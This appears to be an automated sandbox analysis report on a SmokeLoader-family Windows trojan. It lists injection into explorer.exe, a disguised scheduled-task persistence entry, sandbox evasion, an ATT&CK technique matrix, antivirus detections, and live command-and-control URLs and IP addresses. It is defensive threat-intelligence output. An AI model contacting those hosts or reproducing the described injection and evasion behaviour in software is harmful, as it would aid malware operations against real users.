    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_02B7FA4A push dword ptr fs:[00000030h]0_2_02B7FA4A
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_02C70D90 mov eax, dword ptr fs:[00000030h]0_2_02C70D90
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_02C7092B mov eax, dword ptr fs:[00000030h]0_2_02C7092B
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_02C80D90 mov eax, dword ptr fs:[00000030h]5_2_02C80D90
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_02C8092B mov eax, dword ptr fs:[00000030h]5_2_02C8092B
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_02DFF0E2 push dword ptr fs:[00000030h]5_2_02DFF0E2

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\explorer.exeFile created: wafguag.1.drJump to dropped file
    Source: C:\Windows\explorer.exeNetwork Connect: 190.156.239.49 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 148.230.249.9 80Jump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeThread created: C:\Windows\explorer.exe EIP: 32A19A8Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagThread created: unknown EIP: 31419A8Jump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: explorer.exe, 00000001.00000000.1894445179.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1892751028.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1897951937.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000001.00000000.1892751028.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: explorer.exe, 00000001.00000000.1892315703.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
    Source: explorer.exe, 00000001.00000000.1892751028.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: explorer.exe, 00000001.00000000.1892751028.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesW,GetConsoleAliasExesLengthA,GetBinaryType,GetLocaleInfoW,FormatMessageA,LoadLibraryA,InterlockedDecrement,0_2_00415530
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesW,GetConsoleAliasExesLengthA,GetBinaryType,GetLocaleInfoW,FormatMessageA,LoadLibraryA,InterlockedDecrement,5_2_00415530
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 7_2_00404E64 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00404E64
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_00415530 InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesW,GetConsoleAliasExesLengthA,GetBinaryType,GetLocaleInfoW,FormatMessageA,LoadLibraryA,InterlockedDecrement,0_2_00415530

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Exploitation for Client Execution
    1
    DLL Side-Loading
    32
    Process Injection
    11
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Archive Collected Data
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    12
    Virtualization/Sandbox Evasion
    LSASS Memory511
    Security Software Discovery
    Remote Desktop ProtocolData from Removable Media2
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
    Process Injection
    Security Account Manager12
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Hidden Files and Directories
    NTDS3
    Process Discovery
    Distributed Component Object ModelInput Capture113
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
    Obfuscated Files or Information
    LSA Secrets1
    Application Window Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing
    Cached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSync114
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    File Deletion
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532605 Sample: K80v6DHFHE.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 23 nwgrus.ru 2->23 37 Multi AV Scanner detection for domain / URL 2->37 39 Suricata IDS alerts for network traffic 2->39 41 Found malware configuration 2->41 43 7 other signatures 2->43 7 K80v6DHFHE.exe 2->7         started        10 wafguag 2->10         started        12 wafguag 2->12         started        signatures3 process4 signatures5 45 Detected unpacking (changes PE section rights) 7->45 47 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->47 49 Maps a DLL or memory area into another process 7->49 59 3 other signatures 7->59 14 explorer.exe 59 3 7->14 injected 51 Antivirus detection for dropped file 10->51 53 Multi AV Scanner detection for dropped file 10->53 55 Machine Learning detection for dropped file 10->55 57 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->57 process6 dnsIp7 25 190.156.239.49, 65282, 65283, 65284 TelmexColombiaSACO Colombia 14->25 27 nwgrus.ru 148.230.249.9, 64968, 64969, 64970 LVLT-3549US Mexico 14->27 19 C:\Users\user\AppData\Roaming\wafguag, PE32 14->19 dropped 21 C:\Users\user\...\wafguag:Zone.Identifier, ASCII 14->21 dropped 29 System process connects to network (likely due to code injection or exploit) 14->29 31 Benign windows process drops PE files 14->31 33 Deletes itself after installation 14->33 35 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->35 file8 signatures9

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    K80v6DHFHE.exe39%ReversingLabsWin32.Trojan.CrypterX
    K80v6DHFHE.exe41%VirustotalBrowse
    K80v6DHFHE.exe100%AviraHEUR/AGEN.1312571
    K80v6DHFHE.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\wafguag100%AviraHEUR/AGEN.1312571
    C:\Users\user\AppData\Roaming\wafguag100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\wafguag39%ReversingLabsWin32.Trojan.CrypterX
    C:\Users\user\AppData\Roaming\wafguag41%VirustotalBrowse
    No Antivirus matches
    SourceDetectionScannerLabelLink
    nwgrus.ru12%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
    https://powerpoint.office.comcember0%URL Reputationsafe
    https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
    https://excel.office.com0%URL Reputationsafe
    http://schemas.micro0%URL Reputationsafe
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
    https://word.office.com0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://aka.ms/Vh5j3k0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
    https://android.notify.windows.com/iOS0%URL Reputationsafe
    https://api.msn.com/0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
    http://unicea.ws/tmp/index.php0%VirustotalBrowse
    https://aka.ms/odirmr0%VirustotalBrowse
    http://nwgrus.ru/tmp/index.php17%VirustotalBrowse
    https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%VirustotalBrowse
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%VirustotalBrowse
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%VirustotalBrowse
    https://api.msn.com/q0%VirustotalBrowse
    http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%VirustotalBrowse
    https://wns.windows.com/L0%VirustotalBrowse
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%VirustotalBrowse
    http://tech-servers.in.net/tmp/index.php2%VirustotalBrowse
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%VirustotalBrowse
    https://api.msn.com/v1/news/Feed/Windows?&0%VirustotalBrowse
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%VirustotalBrowse
    https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%VirustotalBrowse
    https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%VirustotalBrowse
    https://www.msn.com:443/en-us/feed0%VirustotalBrowse
    https://www.rd.com/list/polite-habits-campers-dislike/0%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    nwgrus.ru
    148.230.249.9
    truetrueunknown
    NameMaliciousAntivirus DetectionReputation
    http://unicea.ws/tmp/index.phptrueunknown
    http://nwgrus.ru/tmp/index.phptrueunknown
    http://tech-servers.in.net/tmp/index.phptrueunknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalseunknown
    http://schemas.miexplorer.exe, 00000001.00000000.1914734952.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
      unknown
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
        unknown
        https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          unknown
          https://excel.office.comexplorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.microexplorer.exe, 00000001.00000000.1896371569.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1897161023.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1915165701.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            unknown
            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              unknown
              https://api.msn.com/qexplorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalseunknown
              https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                unknown
                https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  unknown
                  https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1917493591.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                    https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1917493591.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                    https://word.office.comexplorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                    https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://schemas.micrexplorer.exe, 00000001.00000000.1914734952.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1897951937.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                              https://api.msn.com/explorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://outlook.com_explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      190.156.239.49
                                      unknownColombia
                                      10620TelmexColombiaSACOtrue
                                      148.230.249.9
                                      nwgrus.ruMexico
                                      3549LVLT-3549UStrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1532605
                                      Start date and time:2024-10-13 18:26:06 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 8m 10s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:7
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:K80v6DHFHE.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:278df1e655d9d27b659468ea21758d17.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@3/2@6/2
                                      EGA Information:
                                      • Successful, ratio: 66.7%
                                      HCA Information:
                                      • Successful, ratio: 97%
                                      • Number of executed functions: 38
                                      • Number of non-executed functions: 13
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target wafguag, PID 2936 because there are no executed function
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                      • Report size getting too big, too many NtOpenKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      TimeTypeDescription
                                      12:27:29API Interceptor433489x Sleep call for process: explorer.exe modified
                                      17:27:41Task SchedulerRun new task: Firefox Default Browser Agent 1A42601AACC993B6 path: C:\Users\user\AppData\Roaming\wafguag
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      190.156.239.49PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                      • nwgrus.ru/tmp/index.php
                                      tUDGx14UG2.exeGet hashmaliciousSmokeLoaderBrowse
                                      • epohe.ru/tmp/
                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                      • olihonols.in.net/tmp/
                                      BwNKl6G2Rt.exeGet hashmaliciousSmokeLoaderBrowse
                                      • olihonols.in.net/tmp/
                                      yKNb9xVRKP.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                      • 100xmargin.com/tmp/index.php
                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                      • gebeus.ru/tmp/index.php
                                      S5cXNeuCGu.exeGet hashmaliciousSmokeLoaderBrowse
                                      • gebeus.ru/tmp/index.php
                                      148.230.249.9file.exeGet hashmaliciousSmokeLoaderBrowse
                                      • epohe.ru/tmp/
                                      UMcwGj36Oj.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                      • mzxn.ru/tmp/index.php
                                      II0MvEwlPf.exeGet hashmaliciousSmokeLoaderBrowse
                                      • gebeus.ru/tmp/index.php
                                      file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                      • sdfjhuz.com/dl/buildz.exe
                                      MT5Um6Ykrl.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                      • sdfjhuz.com/dl/build2.exe
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      nwgrus.ruFyDBXJE74v.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 78.89.199.216
                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 63.143.98.185
                                      fTKQwp8fRa.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 78.89.199.216
                                      LgigaSKsL6.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 190.224.203.37
                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 190.147.128.172
                                      mGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 119.204.11.2
                                      uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 190.224.203.37
                                      wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 116.58.10.60
                                      bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 190.147.2.86
                                      LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 187.211.161.52
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      TelmexColombiaSACOfile.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 190.147.128.172
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 190.143.63.156
                                      7aodVUk6TV.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 186.86.212.65
                                      79VAlgfTk8.elfGet hashmaliciousMiraiBrowse
                                      • 181.56.182.151
                                      bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 190.147.2.86
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 190.143.63.127
                                      PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 190.156.239.49
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 190.156.168.129
                                      5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 181.52.122.51
                                      XvAqhy3FO6.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 200.118.227.2
